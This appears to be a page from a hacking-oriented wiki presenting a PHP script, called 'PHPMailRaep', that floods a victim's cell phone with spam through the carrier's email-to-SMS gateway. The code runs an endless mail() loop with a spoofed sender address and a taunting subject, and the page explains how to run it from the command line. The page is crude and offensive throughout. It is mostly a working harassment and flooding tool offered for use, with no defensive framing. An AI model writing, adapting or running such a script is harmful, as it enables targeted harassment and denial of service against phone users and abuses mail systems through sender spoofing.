PHPMailRaep
From /i/nsurgency W/i/ki
SMSRaep is a simple script used to spam cell phones.
Code
<?php // Simple phpphonerape by janus zeal // irc.netchan.org #insurgency $to = "phonenumber@emaildomain"; $subject = "asshole of the year"; $message = "haha"; $from = "pedrobear@internet.br"; // From address doesn't have to be valid, but it should look like a real email // Don't edit below here $count = 0; $headers = "From: $from"; while (1) { $count++; mail($to,$subject,$message,$headers); print "Message sent, Now @ " . $count . "\n"; } ?>
Use
Run from the nix command line, sendmail and php-cgi are required.
php-cgi mail.php
Ctrl-c to exit (Not pretty, I know. :\)